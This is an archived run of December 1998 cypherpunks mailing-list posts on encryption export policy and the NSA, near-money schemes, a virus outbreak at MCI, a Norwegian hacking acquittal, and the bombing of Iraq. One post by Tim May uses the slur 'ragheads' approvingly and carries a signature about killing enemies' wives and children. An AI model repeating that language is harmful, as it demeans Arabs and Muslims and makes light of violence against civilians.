Infrastructure (KMI) export licenses to export products with 56-bit or
stronger encryption until year-end.

But some companies are discovering that dealing with the Commerce
Department for a KMI license means more involvement with the NSA.

The Bureau of Export Control is actually just a front for the NSA, said
Alison Giacomelli, director of export compliance at VPNet Technologies,
Inc., a San Jose, Calif.-based vendor of IP-based encryption gateways. 
"The NSA has sign-off authority on these KMI licenses," Giacomelli said. 
In return for the KMI license, VPNet opened itself up for an NSA audit.

"They've already come out once, and they'll be coming out again,"
Giacomelli said. VPNet remains committed to meeting the deadline for adding
key-recovery to its product but has one major problem:  uncertainty about
what the NSA really wants. The confusion means "there's a lot of risk . . .
in terms of engineering and resources," Giacomelli said.

Clearly wary of granting the government supervision over its products,
Microsoft has stubbornly refused to submit a data-recovery plan, even
though the Redmond giant already includes a data-recovery feature in its
Exchange Server. 

"The Exchange Server can only be used when this feature is present," 
Rubenstein said. "Because we haven't filed a product plan, it's harder for
us to export this than for companies that have filed plans."

But in an odd-couple sort of joint-partner arrangement, Microsoft and the
NSA did work together to build what's called Server Gated Cryptography.
Primarily intended to help banks use Web servers to do business
internationally, the technology lets a server with a special digital
certificate provide 128-bit encryption support to a Web browser outside the
U.S.

Sybase, Inc., which also submitted a plan to add key-recovery to its
products, found it hard to satisfy the government's demands. "They approved
our technological approach but disapproved each of our applications with
it," said Sybase President and CEO Mitchell Kertzman. "It's been
frustrating."

Documents recently obtained under the Freedom of Information Act (FOIA) by
the Washington, D.C.-based Electronic Privacy Information Center contain
the data-recovery plan Netscape filed at the Commerce Department last year.

Netscape's plan explains that the "escrow of private encryption keys" could
be achieved by developing client and server products that can only issue an
X.509 digital certificate after the private key has been escrowed. The key
can only be held by an entity chosen by the intranet administrator who
handles security policy.

The Netscape plan called for introducing a certificate server with recovery
capabilities in the first quarter of this year, with the introduction of
S/MIME clients with basic recovery features in the second quarter.

Netscape hasn't actually carried out this plan, and the company declined to
discuss it. Netscape attorney Peter Harter would only say officially, "We
had no choice but to submit the plan, no matter how much we opposed
key-escrow, in order to be part of the ongoing dialog."

Other FOIA documents show that Netscape was regularly briefing the NSA on
its product plans since 1996 and that then NSA Deputy Director William
Crowell took a special interest in trying to dissuade Netscape from using
strong encryption.

Crowell, now vice president for product marketing and strategy at Cylink
Corp., said he had frequent discussions with Netscape, especially
concerning changes to Netscape Navigator. "Their product didn't have a
separate signature key, so if the government used the product for
key-escrow later, you'd have to store the signature key with a third party,
which we thought was a bad idea," Crowell said.  He added that Netscape
Navigator 3.0 adopted the changes the NSA wanted.

According to Crowell, the NSA has a great deal of expertise in securing
communications, and it wants to ensure that products bought by the Defense
Department meet NSA standards. "In addition, as part of the NSA's
intelligence mission, [the agency needs] to have a thorough understanding
of where commercial products are headed."

Taher Elgamal, author of the Netscape data-recovery plan, who recently left
Netscape to start his own venture, said Netscape had no choice but to
maintain constant contact with the NSA. "They're costing the industry a lot
of money,"  Elgamal said. 

Others agree. "Everyone in Silicon Valley, including us, has to have
specific staff - highly paid experts - to deal with them," said Chris
Tolles, security group product manager at Sun. "Their job is to wrangle
this from a policy standpoint."

Sun has had run-ins with the NSA in the past. Two years ago, the NSA
objected to Sun including encryption in the exportable version of Java 1.1.
The end result was that Sun stripped encryption out of Java 1.1 and the
software was delayed by about six months. Related stories: 

 Hole in Internet security discovered - June 30, 1998

 Government restrictions on encryption pose obstacles
 for Internet security - May 18, 1998






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Grigg <iang@systemics.com>
Date: Wed, 23 Dec 1998 00:26:20 +0800
To: iang@systemics.com
Subject: Re: alternative b-money creation
In-Reply-To: <199812140427.AA12697@world.std.com>
Message-ID: <199812221528.LAA05757@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain




> What about near money, e.g., S&H Green Stamps,
> frequent flier miles, Toys R Us Bucks, or anything
> else that can only be used reflexively with the
> issuer?

Near money is something that many people hold out hope for,
and you may all be right, in that it may be the way forward
through the morass of difficulties.  I personally don't think
so, not for any killer reason, but for a whole host of little
reasons.  I'll see if I can't enunciate them, and no doubt
within the session you are running, we'll have some lively
discussions.

> In the Depression, many southern manufacturing
> firms and, so far as my relatives tell, 100% of
> the coal mining outfits, paid in scrip which was
> redeemable only at the company store.  Some of my
> Mother's people worked at the phone company and
> converted their scrip to stock since they judged
> it worthless otherwise.

This is the Hiawatha Hours, as I rudely called them
(I keep forgetting the name, sorry).  Now, these are
working systems.  They are more or less the same as
the LETS systems, which are sort of successful in many
hundreds of places.

Where they work is generally an indication of some
shortage.  With the above systems, and as far as I
can tell, with all systems, there is a shortage of
cash.  It is not just that everyone is poor, but
that the cycle of money in its journey from entity
to entity throughout the economy is broken.  In
contrast to this shortage and cyclic failure, demand
and supply for goods and services remain high, at
least in many sectors.

In this case, anything that is injected can conceivably
bootstrap the cycle again, and this is why, IMHO, the many
different range of instruments all appear to have been
successful.  It is not the instrument, but the presence
of an instrument.

One thing to remember is that the local economy is
generally the larger proportion of the total economy.
I have empirically noted that in most towns with
identifiable export industries, there are 3 people
employed elsewhere for every one within the direct
export sector - this is a reflection that most people
are actually supporting the rest.  (However, this
doesn't take into account the import side of the
equation.)

Under such circumstances, it is no real wonder that
a shortage of money will cause an economy to grind
to a halt, and an injection of money will start it
up again - to the extent that import/export permits.

But bear in mind that this is a competitive scenario,
and the scrip money tends to work well when the statal
currency disappeared as in the Depression.  When the
statal money comes back in, the scrip fails to entice,
because it is only useful by definition for local
products, not imported products.  In that scenario
it is dominated (to use the term) by statal currency.

> You can buy FF miles at
> 2c/mile at both the Delta and AA websites and US
> Air FF miles now exchange 1-for-1 with AA FF
> miles.  Every affinity program in the country
> offers dollar denominated discounts at the home
> issuing location.

Yes, one of the huge barriers to any money system
is the border to any other money system.  At this
border, the change costs are a very important limiter
on the success of the system.  Remember that a merchant
must convert to useful money in order to pay his costs,
so a small system cannot really work without an internal
method of spending money, to offset that.  This is the
real reason why countries have money, because they have
a border that defines a naturally sized unit.

With MTB ecash, this became very apparent when merchants
had to extract their cash at somewhere between 2 and 5
percent, thus putting the lie to the notion of cash.
With FF miles, they alleviate this somewhat by
recasting the situation as a loyalty programme,
and thus you use the internal goods.  So it only
works when you are a regular user.

Adding convertability makes it closer to money.  But
there is one killer that will never make it be accepted
as a dominating form of money.  All loyalty programmes are
calculated on the basis of this actually accruing
value to the provider, rather than the other way
around.  Necessarily, this means the user is paying
for the priviledge of being loyal.

This is done three ways.  Firstly, most successful loyalty
programmes such as FF miles are based on goods with a
low marginal cost but high ticket cost.  To the airline,
it costs the price of a seat which is somewhere around
$30.  To you, you believe that you are getting, say, $200
value (for points marked as $200 for example).  Within
that range, the airline wins.

Secondly, on average, FF miles are not actually used up
beyond a benchmark figure of 30%.  Airlines also have a
number of tricks that use up or block the use of points.

Thirdly, FF miles work best when the individual is
consuming, but the company is paying.  What FF miles
are is essentially a bribe to the business traveller
to insist on using their airline, when the traveller
doesn't otherwise care.  This separation of user from
payer is cunning marketing, something that is employed
by all the best companies (IBM were the past masters,
now the crown has passed to M$.  Odd that computing
displays this domination amongst all industries...).

Now, regardless of all this, you are right that these
systems take on the nature of money if people suffer
all these things and then continue to participate.
What can stop these becoming real useful is several
things: people working out that they are regularly
over paying, taxation departments working out that
the business traveller is taking an untaxed benefit,
and various other hurdles.

If you can manage to navigate that particular river
stretch of crocs and snakes, then you might make
money, to stretch a pun.  However, if you are going
to all that trouble, why not just start a real money?
That's my real thesis.

> I can get a tax deduction for
> turning in some of these sorts of things to, say,
> the Make A Wish Foundation.

Well, not sure what to say about giving away your
overpaid loyalty points.  That makes for two charities,
the Foundation and the Airline.

> My university co-op
> gives rebates based on purchase volume and in
> cash, but there is no attempt to verify that the
> purchaser is really the account holder if that
> holder pays in cash.

Oh, anonymity/untraceability/bearer status might be
useful features, but that is only what they are, features.  
If our objective is to invent one with those features
as requirement, then I think you will find a single
purpose, centralised registry, poor convertability
system as a really bad starting point.

>  For the longest time,
> stamps could be used in place of coin for small
> denomination mail order.

Single system.  Why did they stop?

> Until security worries
> required a named passenger, shuttle tickets
> between Boston and NYC might as well have been
> cash.

We know why these have been stopped.  For precisely
reasons similar to the elimination of unknown activity,
including monetary activity.  Add this to the list of
disadvantages of near money.

> The Mass State Legislature only this past
> week considered a bill that would make used
> (non-winning) lottery tickets have a residual
> cash value useful only at lottery agents (this as
> an anti-litter thing).

Ah, so this will be very interesting.  So will there
be an arbitrary limit placed on there to stop them
being used as cash?  Remember that cash itself dominates
if you can more easily use cash rather than a handful
of used lottery tickets.

> My thinking -- enough near money and it will tend
> to convertibility...

Yes, that I agree with.  But I fall short of saying
that it reaches a useful level of convertibility.

Looking forward to our loyalty systems session in
March!  Actually, I should mention that whilst I
do not favour these systems for the above reasons,
I do believe that in the study of them, we better
understand how money works, much more so than if
we were to simply study money, which is so completely
lost in statal marketing these days as to be
unfathomable in isolation.

iang




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 23 Dec 1998 04:14:01 +0800
To: cypherpunks@cyberpass.net
Subject: RE: politically correct bomb graffiti
In-Reply-To: <367FEC2E.DC94D311@acm.org>
Message-ID: <v03130305b2a5a712f8b3@[209.66.100.92]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:59 AM -0800 12/22/98, Jim Gillogly wrote:
>~> WASHINGTON (AP) -- Defense Department officials said Monday they were
>~> distressed about ``thoughtless graffiti'' referring to the Islamic holy
>~> month of Ramadan on a Navy bomb being prepared for dropping on Iraq.
>
>xasper8d writes:
>> What's the 90's PC war cry?  Go ahead and nuke 'em, just don't be
>> insensitive about it.
>
>While I also would be more offended by someone bombing me into a
>thin film of viscera and connective tissue than by having them
>ridicule my beliefs, I think the Pentagon was more concerned about
>the effect on our allies in the Gulf.  The recent bombing was an
>attack against the Iraqi military and leadership rather than on
>Islam, and having that graffito get big airplay could offend other
>countries that we'd prefer not to offend.  So while they looked
>silly complaining about the Ramadan reference, they'd have looked
>worse if they'd passed it off with a shrug and/or another ethnic
>or religious slur.

We bombed during "Bombadan" to send the ragheads a message. I thought this
was obvious to all.

--Tim May

We would go to their homes, and we'd kill their wives and
their children. We would kill their families
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 23 Dec 1998 02:44:24 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Trust in Cyberspace
Message-ID: <199812221816.NAA22485@smtp0.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



We offer the National Academy of Sciences September
1998 report, "Trust in Cyberspace," a 243-page survey
of all security issues and technologies associated with the 
Internet and computer networks:

   http://jya.com/tic-intro.htm  (Introduction only, 58K)

   http://jya.com/tic.htm  (Full report, 882K)

   http://jya.com/tic.zip  (Full report zipped, 302K)

The report reviews prior studies such as the CRISIS report
on cryptography, the PCCIP report on protecting US
infrastructure, the DoD report on Information Warfare -
Defense, and several others, assesses those findings
in greater depth, looks at technology and research
needed, and recommends what government (NSA and
DARPA) and private industry/eduation should do to
assure security.

NSA is upbraided for its opposition to strong cryptography 
and culture of overcontrolling secrecy. NSA's R2 research 
unit is singled out as needing to find ways to compete with 
industry for the best talent so that the agency's skills and 
tools do not lag the world market.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@openpgp.net>
Date: Wed, 23 Dec 1998 03:03:00 +0800
To: Multiple recipients of list <cypherpunks@openpgp.net>
Subject: [mitnick] on another note .. (fwd)
Message-ID: <Pine.LNX.4.05.9812230305270.11206-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain



No introduction needed...

--Max

---------- Forwarded message ----------
Date: Tue, 22 Dec 1998 17:25:40 +0100
X-Loop: openpgp.net
From: Tor Fosheim <tor.fosheim@bigfoot.com>
Reply-To: mitnick@2600.com
To: mitnick@2600.com
Subject: [mitnick] on another note ..

The Highest court in Norway has freed a computer engineer from Norman Data
Defense Systems from charges relating to a computer break-in at the
University of Oslo in 1995. It acknowledged the fact that he broke in
through a security hole, but said it was not illegal for him to do so.

The court said that anyone who makes their computers available on the
internet should be prepared for the machines to accept "requests for
information contained on it". Ie, if its not protected well enough -- its
the owner of the machine who is to blame.

Tor





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Moya <moya@navigo.com>
Date: Wed, 23 Dec 1998 03:06:07 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: MCI hit with encryption virus [CNN] (fwd)
In-Reply-To: <199812221332.HAA06736@einstein.ssz.com>
Message-ID: <199812221943.NAA08478@www.navigo.com>
MIME-Version: 1.0
Content-Type: text



Anyone else find it interesting that the release for this outside of NAI press release was at CNN/fn and not CNN's tech section?  The stock shot up 6 and 3/8 on the 
news.  Pretty nice Christmas bonus to say the least.

Couple other more timely and detailed notes on the event:

http://www.ilhawaii.net/webnews/wed/aq/Nd55_38.html
http://www.ilhawaii.net/webnews/wed/dm/Nd55_51.html

Also a local TV station (Austin) on the 5pm news last night had some official
working on this fiasco quoted as saying that this was the first large case of
"cyberterrorism" that he had encountered.  I hope the national media doesn't 
start goose stepping to that account things; otherwise, expect this and related 
events to be cited by CIAO and other gubment offices in their initiatives next year 
to round up network incident response teams nationally and globally.

http://www.ciao.gov/
http://www.pccip.gov/

moya

--
a Navigo farmer
 Have an <Interesting> New Millenium- 
 <http://www.netmeg.net/jargo/terms/i/interesting.html>
 <Days: 374 Hours: 11 Minutes: 42 Seconds: 6>

> Forwarded message:
> >From owner-cypherpunks@ssz.com Tue Dec 22 07:32:13 1998
> From: Jim Choate <ravage@einstein.ssz.com>
> Subject: MCI hit with encryption virus [CNN]
> To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
> Date: Tue, 22 Dec 1998 07:31:11 -0600 (CST)
> 
> > X-within-URL: http://cnnfn.com/digitaljam/9812/21/virus_pkg/
> 
> >    From Correspondent Bruce Francis
> >    December 21, 1998: 7:56 p.m. ET
> 
> >    July 30, 1998 Network Associates MCI WorldCom More Quotes.... Network
> >    Associates Anti-virus Research Center   NEW YORK (CNNfn) - Employees
> >    at MCI WorldCom were confronted with a science fiction scenario made
> >    cold fact on Monday when a computer virus struck the company's
> >    sprawling network, encrypting and destroying files.
> >    [INLINE] To make things worse, virus consultants Network Associates
> >    (NETA) say that the virus -- called "Remote Explorer" -- is unlike
> >    any other and may be the smartest, most dangerous computer bug to
> >    date.
> 
> [text deleted]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Wed, 23 Dec 1998 04:55:26 +0800
To: cypherpunks@toad.com
Subject: Returned post for press-english-technical@lists.datafellows.com (fwd)
Message-ID: <Pine.BSF.3.96.981222134958.2824J-110000@greeves.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain

They are using the EzMLM Pgm???  What does *that* tell you???

Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------


---------- Forwarded message ----------
Date: 22 Dec 1998 15:51:33 -0000
From: press-english-technical-help@lists.datafellows.com
To: measl@mfn.org
Subject: Returned post for press-english-technical@lists.datafellows.com

Hi! This is the ezmlm program. I'm managing the
press-english-technical@lists.datafellows.com mailing list.

I'm sorry, the list moderators have failed to act on your post.
Thus, I'm returning it to you. If you feel that this is in error,
please repost the message or contact a list moderator directly.

--- Enclosed, please find the message you sent.



To: cypherpunks@toad.com,       Marita Nasman-Repo <Marita.Nasman-Repo@DataFellows.com>,       pirkka.palomaki@DataFellows.com, ari.hypponen@DataFellows.com
Subject: Re: MEDIA RELEASE: Data Fellows Joins the Microsoft Security  Partners Program
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Tue, 15 Dec 1998 12:23:32 -0600 (CST)
cc: press-pr@lists.datafellows.com, df-pr-us@lists.datafellows.com,       press-english-technical@lists.datafellows.com,       press-english-general@lists.datafellows.com
Delivered-To: moderator for press-english-technical@lists.datafellows.com
In-Reply-To: <3.0.32.19981215170136.0098ad60@smtp.datafellows.com>
Posted-Date: Tue, 15 Dec 1998 12:23:32 -0600 (CST)

On Tue, 15 Dec 1998, Marita Nasman-Repo Blathered:

:Helsinki, Finland, December 15, 1998-- Data Fellows, the global leader in
:developing data security software solutions, has been invited to join the
:Microsoft Security Partners Program.
"Invited"?   You mean they finally accepted your application, right?

:The Microsoft Security Partners Program
:(http://www.microsoft.com/security/partners) provides customers with the
:tools and information they need to establish, test and maintain effective
:information security for their computing infrastructure. 
By providing real-life examples of how NOT to implement security
practices.  By simply purchasing these failed products (at only *slightly*
exhorbitant prices), so can learn by example: see for yourself just how
easy it is to completely botch a security directive.  Witness how
thoroughly you can mangle password encryption.  Learn what major design
flaws *really* look like!

:The program brings
:together software manufacturers, security consultants and security
:trainers, making it even easier for customers to provide robust security in
:their Microsoft Windows NT operating system-based networks.
Just as soon as it becomes available?  Oh, BTW, when *will* that be???

:Three Data Fellows products are included in the Microsoft Security Partners
:Program. 
I'm sorry.  But don't worry, if you keep working on it, you'll be able to
sell it to a *real* vendor someday...

:F-Secure Workstation Suite consists of malicious code detection
:and removal as well as unobtrusive file and network encryption,
Very unobtrusive, I'm sure!  Does the attacker even know it's there?

: all
:integrated into a policy-based management architecture. 
Hmmm... Somebody's been playing with their buzzword-generator again :)

:F-Secure VPN+
:provides a software-based, IPSec/IKE VPN solution scaleable for large
:corporate networks as well as remote and small office networks.
Was that IPSec/IKE, or IPSec-like?  I vote for the latter.  It's just like
IPSec, but without wasting all those nasty cycles on dumb things - like
encryption: it's *so much* more user-friendly when it doesnt [further]
slow the speed of new window open/closes...

: F-Secure
:FileCrypto is the first and only product to integrate strong real-time
:encryption directly into the Windows NT-based file system.
Could be, we already know that Micro$loth has *no clue* when it comes to
these things (Right Paul???)...

:"Microsoft is pleased to include Data Fellows as part of its Security
:Partners Program," said Karan Khanna, Windows NT Security Product Manager
:at Microsoft Corp.
Of course you are.  Micro$loth would be pleased to welcome Joseph Stalin
into the Security Partners Program.

: "This program will help our mutual customers develop and
:deploy secure solutions built on the Windows NT platform."
Just as soon as they can get Windows NT to run faster than a 6809 with 1k
of 512ns RAM and a single parallel port for IO ;-)

:"The relationship with Microsoft shows Data Fellows' commitment to improve
:the native security of standalone and networked computers with a
:comprehensive, centrally managed suite of security services," said Risto
:Siilasmaa, president and CEO of Data Fellows. 
You're *that* worried about Micro$loth's current offerings, huh?
Personally, I'd let them fend for themselves, but...

:"Data Fellows is committed to
:providing globally available 
And this *IS* your *FIRST* priority, isn't it?

:seamless security for Windows users; security
:that is strong yet easy to manage and economical."
Great!  Let me know when it's available!

:Data Fellows is one of the world's leading developers of data security
:products.
Really?  Who decided that?  Do you have any research to back up this
awe-inspiring claim?

: The company develops, markets and supports anti-virus, data
:security and cryptography software products for corporate computer
:networks.
That's only because most of the private networks already know better.


Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Wed, 23 Dec 1998 04:47:38 +0800
To: cypherpunks@toad.com
Subject: Graffitti or National Policy?
Message-ID: <Pine.BSF.3.96.981222141335.2824T-100000@greeves.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain




	HEY, REEZA!  ARE YOU *LISTENING* ???
-----
 Pentagon Decries U.S. Bomb Graffiti 
Tuesday, December 22, 1998; 1:24 a.m. EST

::WASHINGTON (AP) -- Defense Department officials said Monday they were
::distressed about ``thoughtless graffiti'' referring to the Islamic holy
::month of Ramadan on a Navy bomb being prepared for dropping on Iraq. 

Next time, the CIC demands that you put *more* thought into it...

::The Associated Press last Saturday transmitted a photograph of a
::2,000-pound laser-guided bomb on the aircraft carrier USS Enterprise in
::the Persian Gulf waiting to be loaded on F-14 and F-18 jet fighters. 

Of course, they didn't mind the *bomb* being televised, only the
graffitti :-/

::The bomb bore several inscriptions, including one that said, ``Here's a
::Ramadan present from Chad Rickenberg.'' 

Reeza, why wasn't *your* Ramadan Missive there?

::``Department of Defense officials were distressed to learn of
::thoughtless graffiti mentioning the holy month of Ramadan written on a
::piece of U.S. ordnance during Operation Desert Fox'' in Iraq, chief
::Pentagon spokesman Kenneth Bacon said in a statement. 

Yeah, it's perfectly OK to bomb them during Ramadan (for their own good of
course), but not to actually *acknowledge* it...

::``Religious intolerance is an anathema to Secretary of Defense
::William S. Cohen and to all Americans who cherish the right to worship
::freely,'' he added.

Unless you 
	(a) happen to be Arabic [aside: The odds that an Arabic male
	is depicted as dirty, bad, untrustworthy, etc, in any motion pic
	emanating from the US? A: 19 in 20 {harpers}]
	(b) happen to live in any territory currently occupied by any
	puppet of the USG (Israel comes immediately to mind, but lets face
	it, there's plenty of others), 
	(c) don't agree with every single thing the USG/POTUS has done for
	the last 200++ years...

:: ``The United States deeply respects Islam. We are grateful for
::our good relations with Arab and Islamic peoples,

We are especially grateful that they so freely allow us to bomb their men
women and children whenever we get bored or involved in any domestic issue
that might embarrass the USG/POTUS/IRS/NSA/etc...  Or when we aren't sure
that a new weapon technology is actually "Ready For Prime Time"...

:: and we appreciate the
::important contributions of Muslim-Americans to the U.S. military and to
::our nation as a whole. 

See above :-/

::``I know our people in uniform respect and appreciate religious
::practices different from their own.

Exactly!  What Mr. Rickenberg *meant* to say was "Merry Christmas", right?

:: This incident is a rare exception that does not
:: reflect American policy or values.'' 

The bombing/starving/massacring of innocent civilians, or the graffitti
that didn't have enough thought in it?

Isn't it amazing how the military hates having their laundry aired in
public??? 


Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Wed, 23 Dec 1998 05:04:04 +0800
To: Reeza! <howree@cable.navy.mil>
Subject: Re: I must admit. . .
In-Reply-To: <3.0.5.32.19981222230204.03b51100@205.83.192.13>
Message-ID: <Pine.BSF.3.96.981222142319.2917A-100000@greeves.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 22 Dec 1998, Reeza! blathered thusly:
:>*WHY* is it any of our business whether he owns weapons of *any* kind?  WE
:>own them, and we USE them: Does this give other nations the right to
:>embargo us, and to bomb us into oblivion if we refuse to allow THEM to
:>tell US what to do?
:>
:>Our concern for his weaponry should only be an issue *IF* he uses them, as
:>with *OUR* weaponry.  Yours is the classical anti-gun argument, and it's
:>no more effective at the international level than at the state level.
:
:This would be a valid argument, if he had not already sanctioned Kuwait.
:OOPS. Did you forget that?

Hrmm... And we have never "sanctioned" (gotta love those innocuous
euphemisms) any soveriegn State?  What good for the goose is not good for
the gander?  I repeat, *what gives us the RIGHT* to determine his weaponry
or lack thereof?

:Your arguments would be better applied to Somalia and Bosnia than they are
:to Iraq. Our presence in those countries was of a slightly different
:character than it is in Iraq now isn't it???
Yes indeed.  In these two countries we were there only to watch over the
slaughter, not to perpetuate it ourselves.  Mustv'e ruined your Military
Day (tm), huh Reeza?

:>:Reeza!
:>:DH Key available on request
:>Note that your DH Key is a "munition"...  Shouldn't you be "qualified" to
:>have it by the USG - strictly for the safety of the world, of course...
:>
:>Yours, 
:>J.A. Terranson
:>sysadmin@mfn.org
:
:well J.A., my DH Key is just as much a "munition" as my house key, legal
:definitions not-withstanding.

I see the law means much to you.  This why you joined the military? Or is
it that they wouldn't take you over at James Bond School?

:The affairs of Men rarely rely on the dictates of logic, or even common sense.
:
:
:	"Yeah, they mostly rely on something below the belt."
:
:				-- my older sister

She must've heard your "Eat my military shorts" comment...


Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 23 Dec 1998 04:14:03 +0800
To: geer@world.std.com
Subject: Re: alternative b-money creation
In-Reply-To: <199812140427.AA12697@world.std.com>
Message-ID: <v04020a06b2a5a534ec56@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:28 AM -0500 on 12/22/98, Ian Grigg wrote:


> This is the Hiawatha Hours, as I rudely called them
> (I keep forgetting the name, sorry).  Now, these are
> working systems.  They are more or less the same as
> the LETS systems, which are sort of successful in many
> hundreds of places.

Ithaca Hours. They like LETS, are based, more or less, on Marx's "Labor
Theory of Value".

'nuff said, I figure. Stupid is as stupid does, to quote a famous Alabaman...

:-).

Cheers,
RAH


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 23 Dec 1998 04:53:11 +0800
To: Anonymous <cypherpunks@toad.com
Subject: Re: politically correct bomb graffiti
In-Reply-To: <199812221723.SAA13248@replay.com>
Message-ID: <199812222020.MAA26845@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



Guess folks in WWII shouldn't have been calling the enemy "Krauts."

Now it's okay to slaughter Iraqis -- but we can't make fun of them.

These are odd times.

-Declan


At 06:23 PM 12-22-98 +0100, Anonymous wrote:
>..way too amusing..
>
>
> Pentagon Decries U.S. Bomb Graffiti 
>Tuesday, December 22, 1998; 1:24 a.m. EST
>
>WASHINGTON (AP) -- Defense Department officials said Monday they were
>distressed about ``thoughtless graffiti'' referring to the Islamic holy
>month of Ramadan on a Navy bomb being prepared for dropping on Iraq. 
>
>The Associated Press last Saturday transmitted a photograph of a
>2,000-pound laser-guided bomb on the aircraft carrier USS Enterprise in the
>Persian Gulf waiting to be loaded on F-14 and F-18 jet fighters. 
>
>The bomb bore several inscriptions, including one that said, ``Here's a
>Ramadan present from Chad Rickenberg.'' 
>
>``Department of Defense officials were distressed to learn of thoughtless
>graffiti mentioning the holy month of Ramadan written on a piece of U.S.
>ordnance during Operation Desert Fox'' in Iraq, chief Pentagon spokesman
>Kenneth Bacon said in a statement. 
>
>``Religious intolerance is an anathema to Secretary of Defense William S.
>Cohen and to all Americans who cherish the right to worship freely,'' he
>added. ``The United States deeply respects Islam. We are grateful for our
>good relations with Arab and Islamic peoples, and we appreciate the
>important contributions of Muslim-Americans to the U.S. military and to our
>nation as a whole. 
>
>``I know our people in uniform respect and appreciate religious practices
>different from their own. This incident is a rare exception that does not
>reflect American policy or values.'' 
> 
>
>
>
>
>
>
>  
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vdomingo@medialabs.es (Victor Domingo - MediaLabs Comunicacion)
Date: Wed, 23 Dec 1998 01:08:00 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Felices Fiestas
Message-ID: <19981222171922.AAA13596@challenge.medialabs.es@mail.medialabs.es>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3999.1071713823.multipart/mixed"

--Boundary..3999.1071713823.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




Con mis mejores deseos de Felicidad y Prosperidad para el Ao Nuevo.


Vctor Domingo.

Archivo Adjunto idea de mi amigo  Antonio Montorio (http://villanos.net)
_____________________
MediaLabs SuperMailer 2.5
